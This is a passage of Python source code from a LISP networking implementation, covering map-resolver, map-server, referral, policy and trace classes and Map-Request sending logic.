se.source_cache.delete_cache(self.eid)
if (se.source_cache.cache_size() == 0):
lisp_sites_by_eid.delete_cache(self.group)
#endif
#endif
#enddef
def add_source_entry(self, source_se):
if (self.source_cache == None): self.source_cache = lisp_cache()
self.source_cache.add_cache(source_se.eid, source_se)
#enddef
def lookup_source_cache(self, source, exact):
if (self.source_cache == None): return(None)
return(self.source_cache.lookup_cache(source, exact))
#enddef
def is_star_g(self):
if (self.group.is_null()): return(False)
return(self.eid.is_exact_match(self.group))
#enddef
def eid_record_matches(self, eid_record):
if (self.eid.is_exact_match(eid_record.eid) == False): return(False)
if (eid_record.group.is_null()): return(True)
return(eid_record.group.is_exact_match(self.group))
#enddef
def inherit_from_ams_parent(self):
parent = self.parent_for_more_specifics
if (parent == None): return
self.force_proxy_reply = parent.force_proxy_reply
self.force_nat_proxy_reply = parent.force_nat_proxy_reply
self.force_ttl = parent.force_ttl
self.pitr_proxy_reply_drop = parent.pitr_proxy_reply_drop
self.proxy_reply_action = parent.proxy_reply_action
self.echo_nonce_capable = parent.echo_nonce_capable
self.policy = parent.policy
self.require_signature = parent.require_signature
#enddef
def rtrs_in_rloc_set(self):
for rloc_entry in self.registered_rlocs:
if (rloc_entry.is_rtr()): return(True)
#endfor
return(False)
#enddef
def is_rtr_in_rloc_set(self, rtr_rloc):
for rloc_entry in self.registered_rlocs:
if (rloc_entry.rloc.is_exact_match(rtr_rloc) == False): continue
if (rloc_entry.is_rtr()): return(True)
#endfor
return(False)
#enddef
def is_rloc_in_rloc_set(self, rloc):
for rloc_entry in self.registered_rlocs:
if (rloc_entry.rle):
for rle in rloc_entry.rle.rle_nodes:
if (rle.address.is_exact_match(rloc)): return(True)
#endif
#endif
if (rloc_entry.rloc.is_exact_match(rloc)): return(True)
#endfor
return(False)
#enddef
def do_rloc_sets_match(self, prev_rloc_set):
if (len(self.registered_rlocs) != len(prev_rloc_set)): return(False)
for rloc_entry in prev_rloc_set:
old_rloc = rloc_entry.rloc
if (self.is_rloc_in_rloc_set(old_rloc) == False): return(False)
#endfor
return(True)
#enddef
#endclass
class lisp_mr():
def __init__(self, addr_str, dns_name, mr_name):
self.mr_name = mr_name if (mr_name != None) else "all"
self.dns_name = dns_name
self.map_resolver = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.last_dns_resolve = None
self.a_record_index = 0
if (addr_str):
self.map_resolver.store_address(addr_str)
self.insert_mr()
else:
self.resolve_dns_name()
#endif
self.last_used = 0
self.last_reply = 0
self.last_nonce = 0
self.map_requests_sent = 0
self.neg_map_replies_received = 0
self.total_rtt = 0
#enddef
def resolve_dns_name(self):
if (self.dns_name == None): return
if (self.last_dns_resolve and
time.time() - self.last_dns_resolve < 30): return
try:
addresses = socket.gethostbyname_ex(self.dns_name)
self.last_dns_resolve = lisp_get_timestamp()
a_records = addresses[2]
except:
return
#endtry
#
# Check if number of A-records have changed and this one is no longer
# valid.
#
if (len(a_records) <= self.a_record_index):
self.delete_mr()
return
#endif
addr = a_records[self.a_record_index]
if (addr != self.map_resolver.print_address_no_iid()):
self.delete_mr()
self.map_resolver.store_address(addr)
self.insert_mr()
#endif
#
# If pull-based decent DNS suffix, then create other lisp_mr() for
# all A-records. Only have master to this (A-record index 0).
#
if (lisp_is_decent_dns_suffix(self.dns_name) == False): return
if (self.a_record_index != 0): return
for addr in a_records[1::]:
a = lisp_address(LISP_AFI_NONE, addr, 0, 0)
mr = lisp_get_map_resolver(a, None)
if (mr != None and mr.a_record_index == a_records.index(addr)):
continue
#endif
mr = lisp_mr(addr, None, None)
mr.a_record_index = a_records.index(addr)
mr.dns_name = self.dns_name
mr.last_dns_resolve = lisp_get_timestamp()
#endfor
#
# Check for deletes.
#
delete_list = []
for mr in lisp_map_resolvers_list.values():
if (self.dns_name != mr.dns_name): continue
a = mr.map_resolver.print_address_no_iid()
if (a in a_records): continue
delete_list.append(mr)
#endfor
for mr in delete_list: mr.delete_mr()
#enddef
def insert_mr(self):
key = self.mr_name + self.map_resolver.print_address()
lisp_map_resolvers_list[key] = self
#enddef
def delete_mr(self):
key = self.mr_name + self.map_resolver.print_address()
if (lisp_map_resolvers_list.has_key(key) == False): return
lisp_map_resolvers_list.pop(key)
#enddef
#endclass
class lisp_ddt_root():
def __init__(self):
self.root_address = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.public_key = ""
self.priority = 0
self.weight = 0
#enddef
#endclass
class lisp_referral():
def __init__(self):
self.eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.group = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.referral_set = {}
self.referral_type = LISP_DDT_ACTION_NULL
self.referral_source = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.referral_ttl = 0
self.uptime = lisp_get_timestamp()
self.expires = 0
self.source_cache = None
#enddef
def print_referral(self, eid_indent, referral_indent):
uts = lisp_print_elapsed(self.uptime)
ets = lisp_print_future(self.expires)
lprint("{}Referral EID {}, uptime/expires {}/{}, {} referrals:". \
format(eid_indent, green(self.eid.print_prefix(), False), uts,
ets, len(self.referral_set)))
for ref_node in self.referral_set.values():
ref_node.print_ref_node(referral_indent)
#endfor
#enddef
def print_referral_type(self):
if (self.eid.afi == LISP_AFI_ULTIMATE_ROOT): return("root")
if (self.referral_type == LISP_DDT_ACTION_NULL):
return("null-referral")
#endif
if (self.referral_type == LISP_DDT_ACTION_SITE_NOT_FOUND):
return("no-site-action")
#endif
if (self.referral_type > LISP_DDT_ACTION_MAX):
return("invalid-action")
#endif
return(lisp_map_referral_action_string[self.referral_type])
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.eid, self.group))
#enddef
def print_ttl(self):
ttl = self.referral_ttl
if (ttl < 60): return(str(ttl) + " secs")
if ((ttl % 60) == 0):
ttl = str(ttl/60) + " mins"
else:
ttl = str(ttl) + " secs"
#endif
return(ttl)
#enddef
def is_referral_negative(self):
return (self.referral_type in \
(LISP_DDT_ACTION_MS_NOT_REG, LISP_DDT_ACTION_DELEGATION_HOLE,
LISP_DDT_ACTION_NOT_AUTH))
#enddef
def add_cache(self):
if (self.group.is_null()):
lisp_referral_cache.add_cache(self.eid, self)
else:
ref = lisp_referral_cache.lookup_cache(self.group, True)
if (ref == None):
ref = lisp_referral()
ref.eid.copy_address(self.group)
ref.group.copy_address(self.group)
lisp_referral_cache.add_cache(self.group, ref)
#endif
if (self.eid.is_null()): self.eid.make_default_route(ref.group)
ref.add_source_entry(self)
#endif
#enddef
def delete_cache(self):
if (self.group.is_null()):
lisp_referral_cache.delete_cache(self.eid)
else:
ref = lisp_referral_cache.lookup_cache(self.group, True)
if (ref == None): return
sref = ref.lookup_source_cache(self.eid, True)
if (sref == None): return
ref.source_cache.delete_cache(self.eid)
if (ref.source_cache.cache_size() == 0):
lisp_referral_cache.delete_cache(self.group)
#endif
#endif
#enddef
def add_source_entry(self, source_ref):
if (self.source_cache == None): self.source_cache = lisp_cache()
self.source_cache.add_cache(source_ref.eid, source_ref)
#enddef
def lookup_source_cache(self, source, exact):
if (self.source_cache == None): return(None)
return(self.source_cache.lookup_cache(source, exact))
#enddef
#endclass
class lisp_referral_node():
def __init__(self):
self.referral_address = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.priority = 0
self.weight = 0
self.updown = True
self.map_requests_sent = 0
self.no_responses = 0
self.uptime = lisp_get_timestamp()
#enddef
def print_ref_node(self, indent):
ts = lisp_print_elapsed(self.uptime)
lprint("{}referral {}, uptime {}, {}, priority/weight: {}/{}".format( \
indent, red(self.referral_address.print_address(), False), ts,
"up" if self.updown else "down", self.priority, self.weight))
#enddef
#endclass
class lisp_ms():
def __init__(self, addr_str, dns_name, ms_name, alg_id, key_id, pw, pr,
mr, rr, wmn, site_id, ekey_id, ekey):
self.ms_name = ms_name if (ms_name != None) else "all"
self.dns_name = dns_name
self.map_server = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.last_dns_resolve = None
self.a_record_index = 0
if (lisp_map_servers_list == {}):
self.xtr_id = lisp_get_control_nonce()
else:
self.xtr_id = lisp_map_servers_list.values()[0].xtr_id
#endif
self.alg_id = alg_id
self.key_id = key_id
self.password = pw
self.proxy_reply = pr
self.merge_registrations = mr
self.refresh_registrations = rr
self.want_map_notify = wmn
self.site_id = site_id
self.map_registers_sent = 0
self.map_registers_multicast_sent = 0
self.map_notifies_received = 0
self.map_notify_acks_sent = 0
self.ekey_id = ekey_id
self.ekey = ekey
if (addr_str):
self.map_server.store_address(addr_str)
self.insert_ms()
else:
self.resolve_dns_name()
#endif
#enddef
def resolve_dns_name(self):
if (self.dns_name == None): return
if (self.last_dns_resolve and
time.time() - self.last_dns_resolve < 30): return
try:
addresses = socket.gethostbyname_ex(self.dns_name)
self.last_dns_resolve = lisp_get_timestamp()
a_records = addresses[2]
except:
return
#endtry
#
# Check if number of A-records have changed and this one is no longer
# valid.
#
if (len(a_records) <= self.a_record_index):
self.delete_ms()
return
#endif
addr = a_records[self.a_record_index]
if (addr != self.map_server.print_address_no_iid()):
self.delete_ms()
self.map_server.store_address(addr)
self.insert_ms()
#endif
#
# If pull-based decent DNS suffix, then create other lisp_ms() for
# all A-records. Only have master to this (A-record index 0).
#
if (lisp_is_decent_dns_suffix(self.dns_name) == False): return
if (self.a_record_index != 0): return
for addr in a_records[1::]:
a = lisp_address(LISP_AFI_NONE, addr, 0, 0)
ms = lisp_get_map_server(a)
if (ms != None and ms.a_record_index == a_records.index(addr)):
continue
#endif
ms = copy.deepcopy(self)
ms.map_server.store_address(addr)
ms.a_record_index = a_records.index(addr)
ms.last_dns_resolve = lisp_get_timestamp()
ms.insert_ms()
#endfor
#
# Check for deletes.
#
delete_list = []
for ms in lisp_map_servers_list.values():
if (self.dns_name != ms.dns_name): continue
a = ms.map_server.print_address_no_iid()
if (a in a_records): continue
delete_list.append(ms)
#endfor
for ms in delete_list: ms.delete_ms()
#enddef
def insert_ms(self):
key = self.ms_name + self.map_server.print_address()
lisp_map_servers_list[key] = self
#enddef
def delete_ms(self):
key = self.ms_name + self.map_server.print_address()
if (lisp_map_servers_list.has_key(key) == False): return
lisp_map_servers_list.pop(key)
#enddef
#endclass
class lisp_interface():
def __init__(self, device):
self.interface_name = ""
self.device = device
self.instance_id = None
self.bridge_socket = None
self.raw_socket = None
self.dynamic_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.dynamic_eid_device = None
self.dynamic_eid_timeout = LISP_DEFAULT_DYN_EID_TIMEOUT
self.multi_tenant_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#enddef
def add_interface(self):
lisp_myinterfaces[self.device] = self
#enddef
def get_instance_id(self):
return(self.instance_id)
#enddef
def get_socket(self):
return(self.raw_socket)
#enddef
def get_bridge_socket(self):
return(self.bridge_socket)
#enddef
def does_dynamic_eid_match(self, eid):
if (self.dynamic_eid.is_null()): return(False)
return(eid.is_more_specific(self.dynamic_eid))
#enddef
def set_socket(self, device):
s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW)
s.setsockopt(socket.SOL_IP, socket.IP_HDRINCL, 1)
try:
s.setsockopt(socket.SOL_SOCKET, socket.SO_BINDTODEVICE, device)
except:
s.close()
s = None
#endtry
self.raw_socket = s
#enddef
def set_bridge_socket(self, device):
s = socket.socket(socket.PF_PACKET, socket.SOCK_RAW)
try:
s = s.bind((device, 0))
self.bridge_socket = s
except:
return
#endtry
#enddef
#endclass
class lisp_datetime():
def __init__(self, datetime_str):
self.datetime_name = datetime_str
self.datetime = None
self.parse_datetime()
#enddef
def valid_datetime(self):
ds = self.datetime_name
if (ds.find(":") == -1): return(False)
if (ds.find("-") == -1): return(False)
year, month, day, time = ds[0:4], ds[5:7], ds[8:10], ds[11::]
if ((year + month + day).isdigit() == False): return(False)
if (month < "01" and month > "12"): return(False)
if (day < "01" and day > "31"): return(False)
hour, mi, sec = time.split(":")
if ((hour + mi + sec).isdigit() == False): return(False)
if (hour < "00" and hour > "23"): return(False)
if (mi < "00" and mi > "59"): return(False)
if (sec < "00" and sec > "59"): return(False)
return(True)
#enddef
def parse_datetime(self):
dt = self.datetime_name
dt = dt.replace("-", "")
dt = dt.replace(":", "")
self.datetime = int(dt)
#enddef
def now(self):
ts = datetime.datetime.now().strftime("%Y-%m-%d-%H:%M:%S")
ts = lisp_datetime(ts)
return(ts)
#enddef
def print_datetime(self):
return(self.datetime_name)
#enddef
def future(self):
return(self.datetime > self.now().datetime)
#enddef
def past(self):
return(self.future() == False)
#enddef
def now_in_range(self, upper):
return(self.past() and upper.future())
#enddef
def this_year(self):
now = str(self.now().datetime)[0:4]
ts = str(self.datetime)[0:4]
return(ts == now)
#enddef
def this_month(self):
now = str(self.now().datetime)[0:6]
ts = str(self.datetime)[0:6]
return(ts == now)
#enddef
def today(self):
now = str(self.now().datetime)[0:8]
ts = str(self.datetime)[0:8]
return(ts == now)
#enddef
#endclass
#
# Policy data structures.
#
class lisp_policy_match():
def __init__(self):
self.source_eid = None
self.dest_eid = None
self.source_rloc = None
self.dest_rloc = None
self.rloc_record_name = None
self.geo_name = None
self.elp_name = None
self.rle_name = None
self.json_name = None
self.datetime_lower = None
self.datetime_upper = None
#endclass
class lisp_policy():
def __init__(self, policy_name):
self.policy_name = policy_name
self.match_clauses = []
self.set_action = None
self.set_record_ttl = None
self.set_source_eid = None
self.set_dest_eid = None
self.set_rloc_address = None
self.set_rloc_record_name = None
self.set_geo_name = None
self.set_elp_name = None
self.set_rle_name = None
self.set_json_name = None
#enddef
def match_policy_map_request(self, mr, srloc):
for m in self.match_clauses:
p = m.source_eid
t = mr.source_eid
if (p and t and t.is_more_specific(p) == False): continue
p = m.dest_eid
t = mr.target_eid
if (p and t and t.is_more_specific(p) == False): continue
p = m.source_rloc
t = srloc
if (p and t and t.is_more_specific(p) == False): continue
l = m.datetime_lower
u = m.datetime_upper
if (l and u and l.now_in_range(u) == False): continue
return(True)
#endfor
return(False)
#enddef
def set_policy_map_reply(self):
all_none = (self.set_rloc_address == None and
self.set_rloc_record_name == None and self.set_geo_name == None and
self.set_elp_name == None and self.set_rle_name == None)
if (all_none): return(None)
rloc = lisp_rloc()
if (self.set_rloc_address):
rloc.rloc.copy_address(self.set_rloc_address)
addr = rloc.rloc.print_address_no_iid()
lprint("Policy set-rloc-address to {}".format(addr))
#endif
if (self.set_rloc_record_name):
rloc.rloc_name = self.set_rloc_record_name
name = blue(rloc.rloc_name, False)
lprint("Policy set-rloc-record-name to {}".format(name))
#endif
if (self.set_geo_name):
rloc.geo_name = self.set_geo_name
name = rloc.geo_name
not_found = "" if lisp_geo_list.has_key(name) else \
"(not configured)"
lprint("Policy set-geo-name '{}' {}".format(name, not_found))
#endif
if (self.set_elp_name):
rloc.elp_name = self.set_elp_name
name = rloc.elp_name
not_found = "" if lisp_elp_list.has_key(name) else \
"(not configured)"
lprint("Policy set-elp-name '{}' {}".format(name, not_found))
#endif
if (self.set_rle_name):
rloc.rle_name = self.set_rle_name
name = rloc.rle_name
not_found = "" if lisp_rle_list.has_key(name) else \
"(not configured)"
lprint("Policy set-rle-name '{}' {}".format(name, not_found))
#endif
if (self.set_json_name):
rloc.json_name = self.set_json_name
name = rloc.json_name
not_found = "" if lisp_json_list.has_key(name) else \
"(not configured)"
lprint("Policy set-json-name '{}' {}".format(name, not_found))
#endif
return(rloc)
#enddef
def save_policy(self):
lisp_policies[self.policy_name] = self
#enddef
#endclass
class lisp_pubsub():
def __init__(self, itr, port, nonce, ttl, xtr_id):
self.itr = itr
self.port = port
self.nonce = nonce
self.uptime = lisp_get_timestamp()
self.ttl = ttl
self.xtr_id = xtr_id
self.map_notify_count = 0
#enddef
def add(self, eid_prefix):
ttl = self.ttl
eid = eid_prefix.print_prefix()
if (lisp_pubsub_cache.has_key(eid) == False):
lisp_pubsub_cache[eid] = {}
#endif
pubsub = lisp_pubsub_cache[eid]
ar = "Add"
if (pubsub.has_key(self.xtr_id)):
ar = "Replace"
del(pubsub[self.xtr_id])
#endif
pubsub[self.xtr_id] = self
eid = green(eid, False)
itr = red(self.itr.print_address_no_iid(), False)
xtr_id = "0x" + lisp_hex_string(self.xtr_id)
lprint("{} pubsub state {} for {}, xtr-id: {}, ttl {}".format(ar, eid,
itr, xtr_id, ttl))
#enddef
def delete(self, eid_prefix):
eid = eid_prefix.print_prefix()
itr = red(self.itr.print_address_no_iid(), False)
xtr_id = "0x" + lisp_hex_string(self.xtr_id)
if (lisp_pubsub_cache.has_key(eid)):
pubsub = lisp_pubsub_cache[eid]
if (pubsub.has_key(self.xtr_id)):
pubsub.pop(self.xtr_id)
lprint("Remove pubsub state {} for {}, xtr-id: {}".format(eid,
itr, xtr_id))
#endif
#endif
#enddef
#endclass
#
# lisp_trace
#
# The LISP-Trace message format is:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=9 | 0 | Local Private Port |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Local Private IPv4 RLOC |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
class lisp_trace():
def __init__(self):
self.nonce = lisp_get_control_nonce()
self.packet_json = []
self.local_rloc = None
self.local_port = None
self.lisp_socket = None
#enddef
def print_trace(self):
jd = self.packet_json
lprint("LISP-Trace JSON: '{}'".format(jd))
#enddef
def encode(self):
first_long = socket.htonl(0x90000000)
packet = struct.pack("II", first_long, 0)
packet += struct.pack("Q", self.nonce)
packet += json.dumps(self.packet_json)
return(packet)
#enddef
def decode(self, packet):
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(False)
first_long = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
first_long = socket.ntohl(first_long)
if ((first_long & 0xff000000) != 0x90000000): return(False)
if (len(packet) < format_size): return(False)
addr = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
addr = socket.ntohl(addr)
v1 = addr >> 24
v2 = (addr >> 16) & 0xff
v3 = (addr >> 8) & 0xff
v4 = addr & 0xff
self.local_rloc = "{}.{}.{}.{}".format(v1, v2, v3, v4)
self.local_port = str(first_long & 0xffff)
packet_format = "Q"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(False)
self.nonce = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
if (len(packet) == 0): return(True)
try:
self.packet_json = json.loads(packet)
except:
return(False)
#entry
return(True)
#enddef
def myeid(self, eid):
return(lisp_is_myeid(eid))
#enddef
def return_to_sender(self, lisp_socket, rts_rloc, packet):
rloc, port = self.rtr_cache_nat_trace_find(rts_rloc)
if (rloc == None):
rloc, port = rts_rloc.split(":")
port = int(port)
lprint("Send LISP-Trace to address {}:{}".format(rloc, port))
else:
lprint("Send LISP-Trace to translated address {}:{}".format(rloc,
port))
#endif
if (lisp_socket == None):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.bind(("0.0.0.0", LISP_TRACE_PORT))
s.sendto(packet, (rloc, port))
s.close()
else:
lisp_socket.sendto(packet, (rloc, port))
#endif
#enddef
def packet_length(self):
udp = 8; trace = 4 + 4 + 8
return(udp + trace + len(json.dumps(self.packet_json)))
#enddef
def rtr_cache_nat_trace(self, translated_rloc, translated_port):
key = self.local_rloc + ":" + self.local_port
value = (translated_rloc, translated_port)
lisp_rtr_nat_trace_cache[key] = value
lprint("Cache NAT Trace addresses {} -> {}".format(key, value))
#enddef
def rtr_cache_nat_trace_find(self, local_rloc_and_port):
key = local_rloc_and_port
try: value = lisp_rtr_nat_trace_cache[key]
except: value = (None, None)
return(value)
#enddef
#endclass
#------------------------------------------------------------------------------
#
# lisp_get_map_server
#
# Return a lisp_ms() class instance. Variable 'address' is a lisp_address()
# class instance.
#
def lisp_get_map_server(address):
for ms in lisp_map_servers_list.values():
if (ms.map_server.is_exact_match(address)): return(ms)
#endfor
return(None)
#enddef
#
# lisp_get_any_map_server
#
# Return the first lisp_ms() class instance.
#
def lisp_get_any_map_server():
for ms in lisp_map_servers_list.values(): return(ms)
return(None)
#enddef
#
# lisp_get_map_resolver
#
# Get least recently used Map-Resolver if address is not supplied. Variable
# 'eid' takes on 3 values, an EID value in the form of lisp_address(), None,
# or "". Value "" means to use any MR, like the first one. Value None means
# to use a map-resolver-name that has not been configured (i.e. "all").
#
def lisp_get_map_resolver(address, eid):
if (address != None):
addr = address.print_address()
mr = None
for key in lisp_map_resolvers_list:
if (key.find(addr) == -1): continue
mr = lisp_map_resolvers_list[key]
#endfor
return(mr)
#endif
#
# Get database-mapping entry to find out which map-resolver name set we
# should use, or pick one from a non-configured mr-name list. Or, get the
# first one for info-requests.
#
if (eid == ""):
mr_name = ""
elif (eid == None):
mr_name = "all"
else:
db = lisp_db_for_lookups.lookup_cache(eid, False)
mr_name = "all" if db == None else db.use_mr_name
#endif
older = None
for mr in lisp_map_resolvers_list.values():
if (mr_name == ""): return(mr)
if (mr.mr_name != mr_name): continue
if (older == None or mr.last_used < older.last_used): older = mr
#endfor
return(older)
#enddef
#
# lisp_get_decent_map_resolver
#
# Get the Map-Resolver based on the LISP-Decent pull mapping system lookup
# algorithm
#
def lisp_get_decent_map_resolver(eid):
index = lisp_get_decent_index(eid)
dns_name = str(index) + "." + lisp_decent_dns_suffix
lprint("Use LISP-Decent map-resolver {} for EID {}".format( \
bold(dns_name, False), eid.print_prefix()))
older = None
for mr in lisp_map_resolvers_list.values():
if (dns_name != mr.dns_name): continue
if (older == None or mr.last_used < older.last_used): older = mr
#endfor
return(older)
#enddef
#
# lisp_ipv4_input
#
# Process IPv4 data packet for input checking.
#
def lisp_ipv4_input(packet):
#
# Now calculate checksum for verification.
#
checksum = struct.unpack("H", packet[10:12])[0]
if (checksum == 0):
dprint("Packet arrived with checksum of 0!")
else:
packet = lisp_ip_checksum(packet)
checksum = struct.unpack("H", packet[10:12])[0]
if (checksum != 0):
dprint("IPv4 header checksum failed for inner header")
packet = lisp_format_packet(packet[0:20])
dprint("Packet header: {}".format(packet))
return(None)
#endif
#endif
#
# Now check TTL and if not 0, recalculate checksum and return to
# encapsulate.
#
ttl = struct.unpack("B", packet[8:9])[0]
if (ttl == 0):
dprint("IPv4 packet arrived with ttl 0, packet discarded")
return(None)
elif (ttl == 1):
dprint("IPv4 packet {}, packet discarded".format( \
bold("ttl expiry", False)))
return(None)
#endif
ttl -= 1
packet = packet[0:8] + struct.pack("B", ttl) + packet[9::]
packet = packet[0:10] + struct.pack("H", 0) + packet[12::]
packet = lisp_ip_checksum(packet)
return(packet)
#enddef
#
# lisp_ipv6_input
#
# Process IPv6 data packet for input checking.
#
def lisp_ipv6_input(packet):
dest = packet.inner_dest
packet = packet.packet
#
# Now check TTL and if not 0, recalculate checksum and return to
# encapsulate.
#
ttl = struct.unpack("B", packet[7:8])[0]
if (ttl == 0):
dprint("IPv6 packet arrived with hop-limit 0, packet discarded")
return(None)
elif (ttl == 1):
dprint("IPv6 packet {}, packet discarded".format( \
bold("ttl expiry", False)))
return(None)
#endif
#
# Check for IPv6 link-local addresses. They should not go on overlay.
#
if (dest.is_ipv6_link_local()):
dprint("Do not encapsulate IPv6 link-local packets")
return(None)
#endif
ttl -= 1
packet = packet[0:7] + struct.pack("B", ttl) + packet[8::]
return(packet)
#enddef
#
# lisp_mac_input
#
# Process MAC data frame for input checking. All we need to do is get the
# destination MAC address.
#
def lisp_mac_input(packet):
return(packet)
#enddef
#
# lisp_rate_limit_map_request
#
# Check to see if we have sent a data-triggered Map-Request in the last
# LISP_MAP_REQUEST_RATE_LIMIT seconds. Return True if we should not send
# a Map-Request (rate-limit it).
#
def lisp_rate_limit_map_request(source, dest):
if (lisp_last_map_request_sent == None): return(False)
now = lisp_get_timestamp()
elapsed = now - lisp_last_map_request_sent
rate_limit = (elapsed < LISP_MAP_REQUEST_RATE_LIMIT)
if (rate_limit):
if (source != None): source = source.print_address()
dest = dest.print_address()
dprint("Rate-limiting Map-Request for {} -> {}".format(source, dest))
#endif
return(rate_limit)
#enddef
#
# lisp_send_map_request
#
# From this process, build and send a Map-Request for supplied EID.
#
def lisp_send_map_request(lisp_sockets, lisp_ephem_port, seid, deid, rloc):
global lisp_last_map_request_sent
#
# Set RLOC-probe parameters if caller wants Map-Request to be an
# RLOC-probe. We use probe_port as 4341 so we the ITR and RTR keying data
# structures can be the same.
#
probe_dest = probe_port = None
if (rloc):
probe_dest = rloc.rloc
probe_port = rloc.translated_port if lisp_i_am_rtr else LISP_DATA_PORT
#endif
#
# If there are no RLOCs found, do not build and send the Map-Request.
#
itr_rloc4, itr_rloc6, device = lisp_myrlocs
if (itr_rloc4 == None):
lprint("Suppress sending Map-Request, IPv4 RLOC not found")
return
#endif
if (itr_rloc6 == None and probe_dest != None and probe_dest.is_ipv6()):
lprint("Suppress sending Map-Request, IPv6 RLOC not found")
return
#endif
map_request = lisp_map_request()
map_request.record_count = 1
map_request.nonce = lisp_get_control_nonce()
map_request.rloc_probe = (probe_dest != None)
#
# Hold request nonce so we can match replies from xTRs that have multiple
# RLOCs. Reason being is because source address may not be the probed
# destination. And on our ETR implementation, we can get the probe request
# destination in the lisp-core/lisp-etr/lisp-rtr processes.
#
if (rloc): rloc.last_rloc_probe_nonce = map_request.nonce
sg = deid.is_multicast_address()
if (sg):
map_request.target_eid = seid
map_request.target_group = deid
else:
map_request.target_eid = deid
#endif
#
# If lookup is for an IPv6 EID or there is a signature key configured and
# there is a private key file in current directory, tell lisp_map_request()
# to sign Map-Request. For an RTR, we want to verify its map-request
# signature, so it needs to include its own IPv6 EID that matches the
# private-key file.
#
if (map_request.rloc_probe == False):
db = lisp_get_signature_eid()
if (db):
map_request.signature_eid.copy_address(db.eid)
map_request.privkey_filename = "./lisp-sig.pem"
#endif
#endif
#
# Fill in source-eid field.
#
if (seid == None or sg):
map_request.source_eid.afi = LISP_AFI_NONE
else:
map_request.source_eid = seid
#endif
#
# If ITR-RLOC is a private IPv4 address, we need it to be a global address
# for RLOC-probes.
#
# However, if we are an RTR and have a private address, the RTR is behind
# a NAT. The RLOC-probe is encapsulated with source-port 4341 to get
# through NAT. The ETR receiving the RLOC-probe request must return the
# RLOC-probe reply with same translated address/port pair (the same values
# when it encapsulates data packets).
#
if (probe_dest != None and lisp_nat_traversal and lisp_i_am_rtr == False):
if (probe_dest.is_private_address() == False):
itr_rloc4 = lisp_get_any_translated_rloc()
#endif
if (itr_rloc4 == None):
lprint("Suppress sending Map-Request, translated RLOC not found")
return
#endif
#endif
#
# Fill in ITR-RLOCs field. If we don't find an IPv6 address there is
# nothing to store in the ITR-RLOCs list. And we have to use an inner
# source address of 0::0.
#
if (probe_dest == None or probe_dest.is_ipv4()):
if (lisp_nat_traversal and probe_dest == None):
ir = lisp_get_any_translated_rloc()
if (ir != None): itr_rloc4 = ir
#endif
map_request.itr_rlocs.append(itr_rloc4)
#endif
if (probe_dest == None or probe_dest.is_ipv6()):
if (itr_rloc6 == None or itr_rloc6.is_ipv6_link_local()):
itr_rloc6 = None
else:
map_request.itr_rloc_count = 1 if (probe_dest == None) else 0
map_request.itr_rlocs.append(itr_rloc6)
#endif
#endif
#
# Decide what inner source address needs to be for the ECM. We have to
# look at the address-family of the destination EID. If the destination-EID
# is a MAC address, we will use IPv4 in the inner header with a destination
# address of 0.0.0.0.
#
if (probe_dest != None and map_request.itr_rlocs != []):
itr_rloc = map_request.itr_rlocs[0]
else:
if (deid.is_ipv4()):
itr_rloc = itr_rloc4
elif (deid.is_ipv6()):
itr_rloc = itr_rloc6
else:
itr_rloc = itr_rloc4
#endif
#endif
#
# And finally add one EID record. The EID we are looking up.
#
packet = map_request.encode(probe_dest, probe_port)
map_request.print_map_request()
#
# If this is an RLOC-probe, send directly to RLOC and not to mapping
# system. If the RLOC is behind a NAT, we need to data encapsulate it
# from port 4341 to translated destination address and port.
#
if (probe_dest != None):
if (rloc.is_rloc_translated()):
nat_info = lisp_get_nat_info(probe_dest, rloc.rloc_name)
#
# Handle gleaned RLOC case.
#
if (nat_info == None):
r = rloc.rloc.print_address_no_iid()
g = "gleaned-{}".format(r)
p = rloc.translated_port
nat_info = lisp_nat_info(r, g, p)
#endif
lisp_encapsulate_rloc_probe(lisp_sockets, probe_dest, nat_info,
packet)
return
#endif
addr_str = probe_dest.print_address_no_iid()
dest = lisp_convert_4to6(addr_str)
lisp_send(lisp_sockets, dest, LISP_CTRL_PORT, packet)
return
#endif
#
# Get least recently used Map-Resolver. In the RTR make sure there is a
# Map-Resolver in lisp.config with no mr-name or mr-name=all.
#
local_eid = None if lisp_i_am_rtr else seid
if (lisp_decent_pull_xtr_configured()):
mr = lisp_get_decent_map_resolver(deid)
else:
mr = lisp_get_map_resolver(None, local_eid)
#endif
if (mr == None):
lprint("Cannot find Map-Resolver for source-EID {}".format( \
green(seid.print_address(), False)))
return
#endif
mr.last_used = lisp_get_timestamp()
mr.map_requests_sent += 1
if (mr.last_nonce == 0): mr.last_nonce = map_request.nonce
#
# Send ECM based Map-Request to Map-Resolver.
#
if (seid == None): seid = itr_rloc
lisp_send_ecm(lisp_sockets, packet, seid, lisp_ephem_port, deid,
